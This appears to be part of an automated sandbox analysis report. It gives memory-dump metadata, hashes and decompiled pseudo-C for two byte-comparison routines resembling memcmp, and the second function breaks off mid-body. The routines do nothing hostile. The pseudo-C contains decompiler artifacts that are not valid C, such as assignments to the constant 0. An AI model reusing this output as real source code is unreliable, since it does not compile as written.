                  0x00421119
                  0x0042111d
                  0x0042111f
                  0x00421136
                  0x00421136
                  0x0042113a
                  0x0042113e
                  0x00421140
                  0x00421157
                  0x00421157
                  0x0042115b
                  0x0042115f
                  0x00421161
                  0x00421178
                  0x00421178
                  0x0042117c
                  0x00421180
                  0x00421182
                  0x00421188
                  0x0042118b
                  0x0042118f
                  0x0042118f
                  0x00000000
                  0x00421182
                  0x00421167
                  0x0042116a
                  0x0042116e
                  0x00421172
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421172
                  0x00421146
                  0x00421149
                  0x0042114d
                  0x00421151
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421151
                  0x00421125
                  0x00421128
                  0x0042112c
                  0x00421130
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004204ff

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dfcb5f26736543fc783609c650828bf312b34bc7f444e77ccbe92bc23dd9fe9a
                  • Instruction ID: d238a30811c4ae5bff24da48d1903468bf1608a56587440d766832d2a3ad9798
                  • Opcode Fuzzy Hash: dfcb5f26736543fc783609c650828bf312b34bc7f444e77ccbe92bc23dd9fe9a
                  • Instruction Fuzzy Hash: E6027C33E497B34B8B718EB950E052B7AE05E0169035E87EADCC02F397D11ADD1A96E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042110D(void* __eax, void* __ecx) {
                  				void* _t196;
                  				signed int _t197;
                  				void* _t200;
                  				signed char _t206;
                  				signed char _t207;
                  				signed char _t208;
                  				signed char _t210;
                  				signed char _t211;
                  				signed int _t216;
                  				signed int _t316;
                  				void* _t319;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t327;
                  				void* _t330;
                  				void* _t332;
                  				void* _t334;
                  				void* _t337;
                  				void* _t339;
                  				void* _t341;
                  				void* _t344;
                  				void* _t346;
                  				void* _t348;
                  				void* _t351;
                  				void* _t353;
                  				void* _t355;
                  				void* _t358;
                  				void* _t360;
                  				void* _t362;
                  
                  				_t200 = __ecx;
                  				_t196 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                  					_t316 = 0;
                  					L17:
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					_t206 =  *(_t196 - 0x1b);
                  					if(_t206 ==  *(_t200 - 0x1b)) {
                  						_t316 = 0;
                  						L28:
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						_t207 =  *(_t196 - 0x17);
                  						if(_t207 ==  *(_t200 - 0x17)) {
                  							_t316 = 0;
                  							L39:
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							_t208 =  *(_t196 - 0x13);
                  							if(_t208 ==  *(_t200 - 0x13)) {
                  								_t316 = 0;
                  								L50:
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                  									_t316 = 0;
                  									L61:
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									_t210 =  *(_t196 - 0xb);
                  									if(_t210 ==  *(_t200 - 0xb)) {
                  										_t316 = 0;
                  										L72:
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										_t211 =  *(_t196 - 7);
                  										if(_t211 ==  *(_t200 - 7)) {
                  											_t316 = 0;
                  											L83:
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                  											if(_t319 == 0) {
                  												L5:
                  												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                  												if(_t321 == 0) {
                  													L3:
                  													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                  													if(_t197 != 0) {
                  														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                  													}
                  													L2:
                  													return _t197;
                  												}
                  												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  												if(_t216 != 0) {
                  													L86:
                  													_t197 = _t216;
                  													goto L2;
                  												} else {
                  													goto L3;
                  												}
                  											}
                  											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                  											if(_t216 == 0) {
                  												goto L5;
                  											}
                  											goto L86;
                  										}
                  										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L76:
                  											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L78:
                  												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                  												if(_t327 == 0) {
                  													L80:
                  													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                  													if(_t316 != 0) {
                  														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  													}
                  													goto L83;
                  												}
                  												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  												if(_t316 != 0) {
                  													goto L1;
                  												}
                  												goto L80;
                  											}
                  											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L78;
                  										}
                  										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L76;
                  									}
                  									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L65:
                  										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L67:
                  											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                  											if(_t334 == 0) {
                  												L69:
                  												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                  												if(_t316 != 0) {
                  													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  												}
                  												goto L72;
                  											}
                  											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L69;
                  										}
                  										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L67;
                  									}
                  									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L65;
                  								}
                  								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L54:
                  									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L56:
                  										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                  										if(_t341 == 0) {
                  											L58:
                  											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                  											if(_t316 != 0) {
                  												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											}
                  											goto L61;
                  										}
                  										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L58;
                  									}
                  									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L56;
                  								}
                  								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L54;
                  							}
                  							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L43:
                  								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L45:
                  									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                  									if(_t348 == 0) {
                  										L47:
                  										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                  										if(_t316 != 0) {
                  											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  										}
                  										goto L50;
                  									}
                  									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L47;
                  								}
                  								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L45;
                  							}
                  							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L43;
                  						}
                  						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L32:
                  							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L34:
                  								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                  								if(_t355 == 0) {
                  									L36:
                  									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                  									if(_t316 != 0) {
                  										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  									}
                  									goto L39;
                  								}
                  								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L36;
                  							}
                  							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L34;
                  						}
                  						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L32;
                  					}
                  					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                  					if(_t358 == 0) {
                  						L21:
                  						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                  						if(_t360 == 0) {
                  							L23:
                  							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                  							if(_t362 == 0) {
                  								L25:
                  								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                  								if(_t316 != 0) {
                  									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  								}
                  								goto L28;
                  							}
                  							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L25;
                  						}
                  						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L23;
                  					}
                  					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					goto L21;
                  				} else {
                  					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                  					__esi =  *(__eax - 0x1f) & 0x000000ff;
                  					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                  					if(__esi == 0) {
                  						L10:
                  						__esi =  *(__eax - 0x1e) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  						if(__esi == 0) {
                  							L12:
                  							__esi =  *(__eax - 0x1d) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  							if(__esi == 0) {
                  								L14:
                  								__esi =  *(__eax - 0x1c) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L17;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L14;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L12;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L10;
                  				}
                  				L1:
                  				_t197 = _t316;
                  				goto L2;
                  			}

































                  0x0042110d
                  0x0042110d
                  0x00421113
                  0x00421193
                  0x00421195
                  0x00421197
                  0x00000000
                  0x00000000
                  0x0042119d
                  0x004211a3
                  0x00421222
                  0x00421224
                  0x00421226
                  0x00000000
                  0x00000000
                  0x0042122c
                  0x00421232
                  0x004212b1
                  0x004212b3
                  0x004212b5
                  0x00000000
                  0x00000000
                  0x004212bb
                  0x004212c1
                  0x00421340
                  0x00421342
                  0x00421344
                  0x00000000
                  0x00000000
                  0x00421350
                  0x004213d0
                  0x004213d2
                  0x004213d4
                  0x00000000
                  0x00000000
                  0x004213da
                  0x004213e0
                  0x0042145f
                  0x00421461
                  0x00421463
                  0x00000000
                  0x00000000
                  0x00421469
                  0x0042146f
                  0x004214ee
                  0x004214f0
                  0x004214f2
                  0x00000000
                  0x00000000
                  0x00421500
                  0x00421502
                  0x004210e5
                  0x004210ed
                  0x004210ef
                  0x00420ccb
                  0x00420cd3
                  0x00420cd5
                  0x00420ce6
                  0x00420ce6
                  0x004208db
                  0x00421637
                  0x00421637
                  0x004210fc
                  0x00421102
                  0x0042151b
                  0x0042151b
                  0x00000000
                  0x00421108
                  0x00000000
                  0x00421108
                  0x00421102
                  0x0042150f
                  0x00421515
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421515
                  0x00421478
                  0x0042147a
                  0x00421491
                  0x00421499
                  0x0042149b
                  0x004214b2
                  0x004214ba
                  0x004214bc
                  0x004214d3
                  0x004214db
                  0x004214dd
                  0x004214ea
                  0x004214ea
                  0x00000000
                  0x004214dd
                  0x004214c9
                  0x004214cd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004214cd
                  0x004214a8
                  0x004214ac
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004214ac
                  0x00421487
                  0x0042148b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042148b
                  0x004213e9
                  0x004213eb
                  0x00421402
                  0x0042140a
                  0x0042140c
                  0x00421423
                  0x0042142b
                  0x0042142d
                  0x00421444
                  0x0042144c
                  0x0042144e
                  0x0042145b
                  0x0042145b
                  0x00000000
                  0x0042144e
                  0x0042143a
                  0x0042143e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042143e
                  0x00421419
                  0x0042141d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042141d
                  0x004213f8
                  0x004213fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004213fc
                  0x0042135a
                  0x0042135c
                  0x00421373
                  0x0042137b
                  0x0042137d
                  0x00421394
                  0x0042139c
                  0x0042139e
                  0x004213b5
                  0x004213bd
                  0x004213bf
                  0x004213cc
                  0x004213cc
                  0x00000000
                  0x004213bf
                  0x004213ab
                  0x004213af
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004213af
                  0x0042138a
                  0x0042138e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042138e
                  0x00421369
                  0x0042136d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042136d
                  0x004212ca
                  0x004212cc
                  0x004212e3
                  0x004212eb
                  0x004212ed
                  0x00421304
                  0x0042130c
                  0x0042130e
                  0x00421325
                  0x0042132d
                  0x0042132f
                  0x0042133c
                  0x0042133c
                  0x00000000
                  0x0042132f
                  0x0042131b
                  0x0042131f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042131f
                  0x004212fa
                  0x004212fe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004212fe
                  0x004212d9
                  0x004212dd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004212dd
                  0x0042123b
                  0x0042123d
                  0x00421254
                  0x0042125c
                  0x0042125e
                  0x00421275
                  0x0042127d
                  0x0042127f
                  0x00421296
                  0x0042129e
                  0x004212a0
                  0x004212ad
                  0x004212ad
                  0x00000000
                  0x004212a0
                  0x0042128c
                  0x00421290
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421290
                  0x0042126b
                  0x0042126f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042126f
                  0x0042124a
                  0x0042124e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042124e
                  0x004211ac
                  0x004211ae
                  0x004211c5
                  0x004211cd
                  0x004211cf
                  0x004211e6
                  0x004211ee
                  0x004211f0
                  0x00421207
                  0x0042120f
                  0x00421211
                  0x0042121e
                  0x0042121e
                  0x00000000
                  0x00421211
                  0x004211fd
                  0x00421201
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421201
                  0x004211dc
                  0x004211e0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004211e0
                  0x004211bb
                  0x004211bf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421115
                  0x00421115
                  0x00421119
                  0x0042111d
                  0x0042111f
                  0x00421136
                  0x00421136
                  0x0042113a
                  0x0042113e
                  0x00421140
                  0x00421157
                  0x00421157
                  0x0042115b
                  0x0042115f
                  0x00421161
                  0x00421178
                  0x00421178
                  0x0042117c
                  0x00421180
                  0x00421182
                  0x00421188
                  0x0042118b
                  0x0042118f
                  0x0042118f
                  0x00000000
                  0x00421182
                  0x00421167
                  0x0042116a
                  0x0042116e
                  0x00421172
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421172
                  0x00421146
                  0x00421149
                  0x0042114d
                  0x00421151
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421151
                  0x00421125
                  0x00421128
                  0x0042112c
                  0x00421130
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421130
                  0x00420506
                  0x00420506
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: 4741e71d284e47a3c90b35b40f6e1a7c1b277869b98708c44e50b28ba682a8f8
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: 4AD19E73E0A9B30A8735852D615823FEAA36FE174035EC7E2DCD43F39AD12A9D4095D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420CED(void* __eax, void* __ecx) {
                  				void* _t191;
                  				signed int _t192;
                  				void* _t195;
                  				signed char _t201;
                  				signed char _t202;
                  				signed char _t203;
                  				signed char _t204;
                  				signed char _t206;
                  				signed int _t211;
                  				signed int _t309;
                  				void* _t312;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t328;
                  				void* _t330;
                  				void* _t332;
                  				void* _t335;
                  				void* _t337;
                  				void* _t339;
                  				void* _t342;
                  				void* _t344;
                  				void* _t346;
                  				void* _t349;
                  				void* _t351;
                  				void* _t353;
                  
                  				_t195 = __ecx;
                  				_t191 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                  					_t309 = 0;
                  					L15:
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					_t201 =  *(_t191 - 0x1a);
                  					if(_t201 ==  *(_t195 - 0x1a)) {
                  						_t309 = 0;
                  						L26:
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						_t202 =  *(_t191 - 0x16);
                  						if(_t202 ==  *(_t195 - 0x16)) {
                  							_t309 = 0;
                  							L37:
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							_t203 =  *(_t191 - 0x12);
                  							if(_t203 ==  *(_t195 - 0x12)) {
                  								_t309 = 0;
                  								L48:
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								_t204 =  *(_t191 - 0xe);
                  								if(_t204 ==  *(_t195 - 0xe)) {
                  									_t309 = 0;
                  									L59:
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                  										_t309 = 0;
                  										L70:
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										_t206 =  *(_t191 - 6);
                  										if(_t206 ==  *(_t195 - 6)) {
                  											_t309 = 0;
                  											L81:
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                  												_t192 = 0;
                  												L3:
                  												return _t192;
                  											}
                  											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                  											if(_t312 == 0) {
                  												L4:
                  												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                  												if(_t192 != 0) {
                  													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                  												}
                  												goto L3;
                  											}
                  											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                  											if(_t211 != 0) {
                  												_t192 = _t211;
                  												goto L3;
                  											}
                  											goto L4;
                  										}
                  										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                  										if(_t314 == 0) {
                  											L74:
                  											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                  											if(_t316 == 0) {
                  												L76:
                  												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                  												if(_t318 == 0) {
                  													L78:
                  													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                  													if(_t309 != 0) {
                  														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  													}
                  													goto L81;
                  												}
                  												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  												if(_t309 != 0) {
                  													goto L1;
                  												}
                  												goto L78;
                  											}
                  											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L76;
                  										}
                  										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L74;
                  									}
                  									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                  									if(_t321 == 0) {
                  										L63:
                  										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L65:
                  											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L67:
                  												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                  												if(_t309 != 0) {
                  													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  												}
                  												goto L70;
                  											}
                  											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L67;
                  										}
                  										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L65;
                  									}
                  									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L63;
                  								}
                  								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                  								if(_t328 == 0) {
                  									L52:
                  									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L54:
                  										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L56:
                  											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                  											if(_t309 != 0) {
                  												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  											}
                  											goto L59;
                  										}
                  										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L56;
                  									}
                  									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L54;
                  								}
                  								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L52;
                  							}
                  							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                  							if(_t335 == 0) {
                  								L41:
                  								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L43:
                  									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L45:
                  										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                  										if(_t309 != 0) {
                  											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  										}
                  										goto L48;
                  									}
                  									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L45;
                  								}
                  								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L43;
                  							}
                  							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L41;
                  						}
                  						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                  						if(_t342 == 0) {
                  							L30:
                  							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L32:
                  								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L34:
                  									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                  									if(_t309 != 0) {
                  										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  									}
                  									goto L37;
                  								}
                  								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L34;
                  							}
                  							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L32;
                  						}
